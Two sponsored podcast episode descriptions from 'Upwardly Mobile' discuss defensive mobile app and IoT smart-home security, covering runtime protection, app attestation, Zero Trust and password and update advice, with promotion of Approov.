In this episode of Upwardly Mobile, we dive deep into the critical, yet often underestimated, world of mobile app security. Drawing on recent research, we uncover a staggering misalignment between perception and reality, highlighting why organizations are facing an average of nine mobile app security incidents per year, with an average financial toll reaching $6.99 million in 2025.While 93% of organizations believe their mobile app protections are sufficient, a substantial 62% have experienced at least one security incident in the past year. The repercussions extend beyond financial losses, including application downtime, sensitive data leaks, erosion of consumer trust, and a diminished user experience.We explore why traditional security measures, particularly code obfuscation, are no longer enough. Obfuscation, while deterring casual attackers, is ultimately a deterrent, not a preventative measure, offering minimal protection against runtime threats, dynamic analysis, and AI-assisted reverse engineering.The real target for modern attackers is increasingly Application Programming Interfaces (APIs). Mobile apps serve as entry points to exploit backend APIs for credential stuffing, data scraping, and business logic abuse, none of which static defenses can prevent. The weaponization of Artificial Intelligence (AI) further escalates these threats, enabling automated botnets, adaptive malware, and accelerated vulnerability discovery.The solution? A crucial shift towards a dynamic, runtime-centric security model rooted in Zero Trust principles. This approach demands continuous monitoring and verification, moving beyond static, pre-deployment checks to protect apps during execution.Key elements of this essential dynamic security strategy include:• Mobile Runtime Application Self-Protection (RASP): Acting as the app’s internal bodyguard, RASP detects and responds to runtime threats like debuggers, tampering, root/jailbreak, and hooking frameworks, offering real-time protection and contextual awareness.• App Attestation & API Request Validation: This is a standout feature, ensuring that only requests truly originating from your official, unmodified mobile app, running on a non-compromised device, are allowed to access your backend APIs. This effectively blocks bots, scripts, tampered apps, and mitigates API abuse.• Runtime Secrets Protection: This critical measure removes sensitive secrets (like API keys) from the app's code entirely. Instead, secrets are delivered securely at runtime, just-in-time, and only to attested apps, preventing extraction through reverse engineering.• Dynamic Channel Protection (Dynamic Pinning): Unlike brittle static certificate pinning, dynamic pinning allows for secure, over-the-air updates of certificate pins, ensuring continuous protection against Man-in-the-Middle (MitM) attacks without requiring app store updates.We also differentiate between leading mobile app security solutions:• Guardsquare, with products like DexGuard and iXGuard, excels in client-side mobile app protection, focusing on code obfuscation, hardening, and RASP to make the app's code incredibly difficult to compromise on the device.• Approov emphasizes remote mobile app attestation, performing deep, continuous inspection of the mobile app and device in the cloud. This server-side decision-making makes it significantly harder for attackers to bypass the attestation process, ensuring only genuine apps access your APIs. Approov's positive security model effectively "locks down" backend APIs.Ideally, a comprehensive mobile app security strategy leverages both types of solutions: Guardsquare for strong in-app protection, and Approov for critical API integrity and abuse prevention. This multi-layered approach, combining static and dynamic defenses, is no longer optional but a fundamental requirement for achieving adequate resilience against modern mobile threats.--------------------------------------------------------------------------------Relevant Links to Source Materials:• Learn more about the research highlighting the mobile app security blindspot: "Research exposes $7M mobile app security blindspot fueled by overconfidence" • Explore in-depth the need for dynamic defenses: "WP- Mobile Security Beyond Obfuscation v1.0 FINAL B.pdf".• Discover Approov's approach to superior mobile API protection: "Approov: Superior Mobile API Protection via Remote Attestation".Sponsor: This episode is brought to you by Approov. Safeguard your mobile apps and APIs with their unique, patented runtime shielding solution. Visit approov.io to learn more.🎙️ Upwardly Mobile is hosted by Skye & George. 🛡️ Sponsored by Approov: The only comprehensive solution for mobile app and API security. 👉 Subscribe & Review: Upwardly Mobile | PodcastThis episode includes AI-generated content.

In this episode, we dive deep into the pressing concerns of Internet of Things (IoT) security, especially within our increasingly connected smart homes. From smart refrigerators to water shut-off valves, these devices offer immense convenience but also present tempting targets for cybercriminals. We'll explore the array of vulnerabilities, real-world attack statistics, and the innovative solutions emerging to protect our digital and physical spaces.Key Discussion Points:The Alarming State of IoT Security:A shocking 57% of IoT devices are vulnerable to medium- or high-severity attacks, with 70% having serious security vulnerabilities overall.A staggering 98% of IoT device traffic is unencrypted, and 43% of manufacturers don't even encrypt data during transmission, leaving sensitive information exposed. This is often due to cost-saving measures or limited processing power in basic device chips.The volume of threats is immense, with 1.5 billion IoT attacks detected in just the first half of 2021. Devices can be targeted within 5 minutes of connecting to the internet, as bots constantly scan for new exploits.IoT devices are a prime attack vector, accounting for 41% of attacks on enterprises in 2020 and comprising 33% of infected devices in botnets like Mirai. The infamous Mirai botnet, which shut down major internet services in 2016, infected over 25 million IoT devices by exploiting weak or default credentials, turning common items like printers and baby monitors into attack armies.Smart home attacks rose by 600% in a single year, highlighting the escalating risk to everyday gadgets.Many organizations face significant challenges, with 72% struggling to discover and classify all IoT devices on their networks, and 67% having limited or no visibility into their IoT environments.A critical issue is the widespread use of weak or default passwords, responsible for 91% of IoT data breaches, alongside the concerning fact that 40% of IoT devices no longer receive vendor security updates, leaving them vulnerable.Real-world incidents, such as cyberattacks on municipal water infrastructure, serve as a stark warning, demonstrating that compromised water control systems can have severe physical consequences, including interference with water composition or service disruption.The Smart Home Ecosystem: A "Toxic Combination" of Apps and APIs:Smart homes are controlled through a complex web of mobile apps and APIs, connecting everything from smart ovens to security cameras.This creates a "toxic combination": mobile apps can be cloned, tampered with, or run on compromised devices, while APIs can be reverse-engineered and invoked by bots or fake clients. Attackers can easily automate abuse once app-to-API traffic is understood.Hackers exploit common issues like lack of app attestation, repackaged or tampered apps, no detection of rooted/jailbroken devices, bypass of obfuscation, API keys hardcoded in the app, and static TLS certificate pins.Threats extend beyond simple data breaches to more severe outcomes like device hijacking, Man-in-the-Middle (MitM) attacks, ransomware, and botnet creation, allowing malicious actors to manipulate physical devices or launch large-scale attacks.Even smart water shutoff systems like Phyn, Moen Flo, and Flo-Logic, while protecting against water damage, introduce data privacy implications (e.g., detailed water usage patterns revealing intimate household routines) and the risk of unauthorized remote control by malicious actors who could repeatedly toggle the water supply, causing disruption or damage. Moen's privacy statement explicitly notes its business model includes "monetizing data".Building a Secure Foundation: Solutions and Best Practices:Adapting OAuth2 for IoT: The OAuth2 open authorization standard, popular on the web, is being adapted to help secure access to IoT devices. This involves the authorization grant flow where a client obtains an access token to delegate access to server resources. Modifications are necessary for constrained IoT environments, such as dynamically securing the channel between a client and resource server (e.g., Alice's phone and a door lock) by using a possession key shared via the authorization server. Another example is a medical device scenario where the authorization server encrypts the possession key into the access token claims using a pre-provisioned key pair.Beyond Static Secrets: A more secure approach involves removing static client secrets from mobile apps and leveraging remote attestation services. A dynamic attestation service can verify an app's authenticity at runtime, returning an authenticating, time-limited client integrity token.Zero Trust Security Model: Smart home platforms should adopt a Zero Trust security model, which inherently trusts nothing by default. Instead, each and every API request must cryptographically prove it originates from a legitimate, unmodified mobile app at runtime. This involves per-request attestation using short-lived, signed tokens and API-side validation.Approov: Enhancing API and App Security: Solutions like Approov Mobile Security play a crucial role by continuously inspecting the app and device to validate the legitimacy of any request from the app, ensuring only authorized apps can access APIs. This not only protects against bots and unauthorized access but also helps reduce cloud costs and allows API owners dynamic control over access policies and certificates without requiring app updates.Key Recommendations for Users and Manufacturers:Always change default passwords immediately upon setup, using strong, unique combinations.Regularly apply firmware and software updates provided by the manufacturer to patch critical security flaws.Implement network segmentation, isolating smart home devices on a separate Wi-Fi network (e.g., a guest network or dedicated IoT VLAN) to limit potential lateral movement for attackers if one device is compromised.Manufacturers must adopt secure development guidelines from day one, conducting regular penetration testing and prioritizing security throughout the product lifecycle, not as an afterthought.Organizations need robust incident response plans and better visibility into their IoT inventories to quickly identify and address threats.For critical systems like water shutoff valves, prioritize devices with robust, independent operation (e.g., hardwired connections, substantial battery backups) over those solely reliant on internet connectivity.Protect your connected devices and digital life by understanding these risks and implementing proactive security measures!Relevant Links:IoT Security Challenges: Device Vulnerability & Attack Stats | PatentPC: https://patentpc.com/blog/iot-security-challenges-device-vulnerability-attack-statsPhyn (Example of Smart Water Solution discussed): https://www.phyn.comSecure your mobile apps and APIs with Approov: https://approov.ioKeywords: IoT Security, Smart Home Security, API Security, Mobile App Security, OAuth2, App Attestation, Zero Trust, Mirai Botnet, Data Breaches, Device Hijacking, Network Segmentation, Cybersecurity, Smart Devices, Connected Home, Digital Privacy, Firmware Updates, Password Security, Water Damage Prevention, Phyn, Moen Flo, Flo-Logic, IoT Vulnerabilities, Mobile API Security.🎙️ Upwardly Mobile is hosted by Skye & George. 🛡️ Sponsored by Approov: The only comprehensive solution for mobile app and API security. 👉 Subscribe & Review: Upwardly Mobile | PodcastThis episode includes AI-generated content.